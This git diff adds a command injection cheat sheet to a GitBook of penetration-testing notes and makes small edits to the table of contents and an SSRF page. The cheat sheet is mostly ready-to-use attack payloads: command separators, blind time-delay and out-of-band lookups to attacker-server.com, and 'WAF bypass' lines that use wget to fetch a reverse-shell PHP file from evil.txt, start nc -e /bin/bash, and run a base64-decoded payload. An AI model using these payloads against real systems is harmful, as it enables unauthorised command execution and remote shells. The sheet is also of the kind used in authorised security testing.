diff --git a/.gitbook/assets/image (26).png b/.gitbook/assets/image (26).png new file mode 100644 index 00000000..1f3c7d64 Binary files /dev/null and b/.gitbook/assets/image (26).png differ diff --git a/SUMMARY.md b/SUMMARY.md index b561fa4f..82bdc583 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -53,7 +53,7 @@ * [HTTP Parameter pollution](enumeration/web/parameter-pollution.md) * [SSTI](enumeration/web/ssti.md) * [Prototype Pollution](enumeration/web/prototype-pollution.md) - * [Tabnabbing](enumeration/web/tabnabbing.md) + * [Command Injection](enumeration/web/command-injection.md) * [Web Services](enumeration/webservices/README.md) * [APIs](enumeration/webservices/apis.md) * [JS](enumeration/webservices/js.md) diff --git a/enumeration/web/command-injection.md b/enumeration/web/command-injection.md new file mode 100644 index 00000000..c2054b44 --- /dev/null +++ b/enumeration/web/command-injection.md @@ -0,0 +1,92 @@ +# Command Injection + +{% hint style="info" %} +Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. +{% endhint %} + +```text +# For detection, try to concatenate another command to param value +& +; +Newline (0x0a or \n) +&& +| +|| +# like: https://target.com/whatever?param=1|whoami + +# Blind (Time delay) +https://target.com/whatever?param=x||ping+-c+10+127.0.0.1|| + +# Blind (Redirect) +https://target.com/whatever?param=x||whoami>/var/www/images/output.txt|| + +# Blind (OOB) +https://target.com/whatever?param=x||nslookup+burp.collaborator.address|| +https://target.com/whatever?param=x||nslookup+`whoami`.burp.collaborator.address|| + +# Common params: +cmd +exec +command +execute +ping +query +jump +code +reg +do +func +arg +option +load +process +step +read +function +req +feature +exe +module +payload +run +print + +# Useful Commands: Linux +whoami +ifconfig +ls +uname -a + +# Useful Commands: Windows +whoami +ipconfig +dir +ver + +# Both Unix and Windows supported +ls||id; ls ||id; ls|| id; ls || id +ls|id; ls |id; ls| id; ls | id +ls&&id; ls &&id; ls&& id; ls && id +ls&id; ls &id; ls& id; ls & id +ls %0A id + +# Time Delay Commands +& ping -c 10 127.0.0.1 & + +# Redirecting output +& whoami > /var/www/images/output.txt & + +# OOB (Out Of Band) Exploitation +& nslookup attacker-server.com & +& nslookup `whoami`.attacker-server.com & + +# WAF bypasses +vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php +vuln=127.0.0.1%0anohup nc -e /bin/bash +vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload + + +``` + + + diff --git a/enumeration/web/ssrf.md b/enumeration/web/ssrf.md index f8699c71..50028040 100644 --- a/enumeration/web/ssrf.md +++ b/enumeration/web/ssrf.md @@ -225,3 +225,7 @@ header('Location: http://127.0.0.1:8080/status'); # https://h.43z.one/ipconverter/ ``` +## Mindmap + +![](../../.gitbook/assets/image%20%2826%29.png) +